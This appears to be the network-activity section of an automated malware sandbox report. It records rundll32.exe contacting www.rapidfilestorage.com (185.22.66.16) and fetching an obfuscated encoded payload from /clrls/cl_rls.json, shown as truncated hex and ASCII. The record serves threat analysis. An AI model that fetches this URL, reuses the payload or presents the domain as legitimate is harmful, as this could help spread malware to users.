Aug 31, 2024 22:05:13.928718090 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:13.933892965 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:13.933954000 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:13.934108019 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:13.934844971 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:13.938873053 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716859102 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716875076 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716881990 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716887951 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716892958 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716900110 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716912985 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.716943979 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.716949940 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.717020988 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.717027903 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.717027903 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.717060089 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.717081070 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.717109919 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.721767902 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.721775055 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.721839905 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.722002983 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.722012997 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.722065926 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.722111940 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.733997107 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734071970 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734078884 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734086037 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734141111 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.734142065 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734148979 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734158993 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.734173059 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734179020 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734184980 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734191895 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.734205961 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.734216928 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.734240055 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.738936901 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.738945007 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.739011049 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.803761959 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.803838968 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.890192032 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890198946 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890218019 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890223026 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890315056 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.890360117 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.890403032 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890408039 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890450001 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.890620947 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890628099 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890635014 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.890693903 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.891000032 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891005993 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891012907 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891060114 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891066074 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891077995 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891088009 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.891138077 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.891860962 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891866922 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891879082 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891943932 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891949892 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891954899 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.891962051 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.891993999 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.892848015 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.892854929 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.892860889 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.892904043 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.892929077 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.892956972 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.892982960 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.895185947 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.895193100 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.895205021 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.895253897 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.907538891 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.907542944 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.907597065 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.907625914 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.907654047 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.907659054 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.907675982 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.907687902 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.907692909 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.907706022 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.907716036 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.907752037 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.908560038 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.908571005 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.908581972 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.908626080 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.908641100 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.909018993 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909024000 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909034014 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909071922 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909071922 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.909077883 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909145117 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.909780025 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909786940 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909797907 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909821987 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909830093 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.909837008 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.909877062 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.909914017 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.910604000 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.910621881 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.910684109 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.910720110 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.912456989 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.912512064 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:14.996143103 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.996149063 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.996160030 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.996165991 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:14.996287107 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:15.062805891 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062813997 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062828064 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062840939 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062870026 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062875986 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062887907 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062894106 CEST	80	49709	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.062937975 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:15.063030958 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:15.081279993 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.081288099 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.081294060 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.081341982 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.081348896 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.081355095 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.081367970 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:15.081379890 CEST	80	49710	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:15.081425905 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:15.081715107 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:15.309556961 CEST	49709	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:15.312577963 CEST	49710	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:16.041946888 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:16.209732056 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:16.209826946 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:16.210118055 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:16.214895964 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003241062 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003253937 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003264904 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003359079 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.003359079 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.003782034 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003803015 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003859043 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.003859043 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.003895044 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003935099 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.003938913 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.003979921 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.004110098 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.004163027 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.004173994 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.004182100 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.004223108 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.008757114 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.008768082 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.008780003 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.008791924 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.008820057 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.008876085 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.009192944 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.009248972 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.173553944 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.173573017 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.173584938 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.173645973 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.173645973 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.173686028 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.173723936 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.173734903 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.173739910 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.173784971 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.174433947 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.174488068 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.174520016 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.174530983 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.174545050 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.174556971 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.174571037 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.174583912 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.174618959 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.174964905 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.174974918 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175040007 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.175077915 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175088882 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175103903 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175123930 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175134897 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175136089 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.175164938 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.175190926 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.175791979 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175837994 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.175947905 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175960064 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.175971031 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.176011086 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.176018000 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.176018000 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.176023960 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.176037073 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.176063061 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.176063061 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.176085949 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.178473949 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.178489923 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.178527117 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.178577900 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:17.178591967 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:17.178654909 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.340380907 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340403080 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340425968 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340435028 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340454102 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.340457916 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340473890 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340501070 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340502977 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.340512037 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340523958 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340533972 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340558052 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.340558052 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.340560913 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340590954 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.340626001 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.340857983 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.340909958 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345391035 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345402002 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345458984 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345458984 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345482111 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345491886 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345510006 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345520973 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345530987 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345530987 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345550060 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345571041 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345607996 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345668077 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.345696926 CEST	80	49711	185.22.66.16	192.168.2.7
Aug 31, 2024 22:05:18.345752001 CEST	49711	80	192.168.2.7	185.22.66.16
Aug 31, 2024 22:05:18.512429953 CEST	49711	80	192.168.2.7	185.22.66.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2024 22:05:13.814819098 CEST	51650	53	192.168.2.7	1.1.1.1
Aug 31, 2024 22:05:13.916145086 CEST	53	51650	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 31, 2024 22:05:13.814819098 CEST	192.168.2.7	1.1.1.1	0x8c37	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 31, 2024 22:05:13.916145086 CEST	1.1.1.1	192.168.2.7	0x8c37	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 22:05:13.916145086 CEST	1.1.1.1	192.168.2.7	0x8c37	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:05:13.916145086 CEST	1.1.1.1	192.168.2.7	0x8c37	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.rapidfilestorage.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49709	185.22.66.16	80	7792	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:05:13.928718090 CEST	116	OUT	GET /clrls/cl_rls.json HTTP/1.1 Host: www.rapidfilestorage.com Connection: Keep-Alive Cache-Control: no-cache
Aug 31, 2024 22:05:14.716859102 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 31 Aug 2024 20:05:14 GMT Content-Type: application/json Content-Length: 50997 Connection: keep-alive Set-Cookie: slb_route=1f6c580d83f149d0f16fd533578761ba; Path=/; Secure; HttpOnly Last-Modified: Tue, 13 Aug 2024 11:20:09 GMT ETag: "66bb4169-c735" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 2d 47 72 53 38 56 73 53 36 51 72 53 33 45 72 53 37 46 72 53 35 5b 72 53 37 7a 71 53 32 45 72 53 35 5c 72 53 34 56 73 53 34 4e 73 53 32 58 73 53 39 47 72 53 35 56 73 53 32 57 72 53 35 56 73 53 30 4e 73 53 37 58 73 53 33 61 71 53 35 56 73 53 36 59 71 53 34 5a 72 53 36 45 72 53 30 46 72 53 37 56 72 53 31 5b 72 53 35 43 72 53 38 5c 72 53 36 60 71 53 36 59 72 53 32 5d 72 53 32 55 72 53 37 56 73 53 35 64 73 53 31 58 73 53 32 56 73 53 33 63 71 53 37 60 71 53 37 70 71 53 37 5b 72 53 33 43 72 53 34 5c 72 53 33 5e 72 53 31 5b 72 53 33 51 72 53 32 56 72 53 36 55 72 53 35 7a 71 53 39 56 73 53 36 64 73 53 39 58 73 53 32 56 73 53 35 45 72 53 30 6a 71 53 35 51 72 53 31 7a 71 53 30 56 73 53 34 64 73 53 34 58 73 53 34 56 73 53 32 5e 73 53 32 49 72 53 39 4f 72 53 37 6b 71 53 31 45 72 53 31 46 72 53 38 5b 72 53 37 78 71 53 37 51 72 53 31 45 72 53 31 5c 72 53 33 4f 72 53 33 5a 72 53 37 65 71 53 36 56 73 53 31 64 73 53 31 58 73 53 38 56 73 53 30 44 72 53 31 43 72 53 39 56 72 53 32 7a 71 53 30 44 72 53 31 51 72 53 38 5a [TRUNCATED] Data Ascii: -GrS8VsS6QrS3ErS7FrS5[rS7zqS2ErS5\rS4VsS4NsS2XsS9GrS5VsS2WrS5VsS0NsS7XsS3aqS5VsS6YqS4ZrS6ErS0FrS7VrS1[rS5CrS8\rS6`qS6YrS2]rS2UrS7VsS5dsS1XsS2VsS3cqS7`qS7pqS7[rS3CrS4\rS3^rS1[rS3QrS2VrS6UrS5zqS9VsS6dsS9XsS2VsS5ErS0jqS5QrS1zqS0VsS4dsS4XsS4VsS2^sS2IrS9OrS7kqS1ErS1FrS8[rS7xqS7QrS1ErS1\rS3OrS3ZrS7eqS6VsS1dsS1XsS8VsS0DrS1CrS9VrS2zqS0DrS1QrS8ZrS1YrS5FrS3BrS0VsS9dsS3XsS2VsS0]qS0UrS0PrS9ZqS5ErS7^rS8UrS1zqS9VsS6dsS7XsS3VsS2uqS4\rS4UrS7FrS8QrS0PrS9PrS1UrS0zqS1VsS7dsS2XsS9VsS6yqS6]rS3VrS9TrS1zqS3WrS5VsS8dsS0XsS9VsS1wqS7YrS3OrS0zqS3[rS1yqS9[rS1TrS5FrS9XsS5^qS2YrS8yqS8ErS5QrS9^rS6XsS2YqS5FrS8ErS0VrS6YrS5[rS6VsS6gqS6dsS0XsS6VsS2DrS9VsS6NsS6XsS6aqS8VsS3^sS6YqS4ZrS9ErS9FrS2VrS0[rS4CrS6\rS1`qS6YrS1]rS0UrS4VsS3gqS4MrS3dsS5XsS6VsS2OrS5ZrS9zqS7[rS8]rS6YrS4ErS9]rS6yqS9VsS2NsS6XsS3aqS1VsS1QrS0QrS6QrS8QrS1QrS5VrS9SrS5UrS6BrS6XrS3WrS4VrS7TrS4TrS6ZrS8XrS5PrS8WrS3Tr
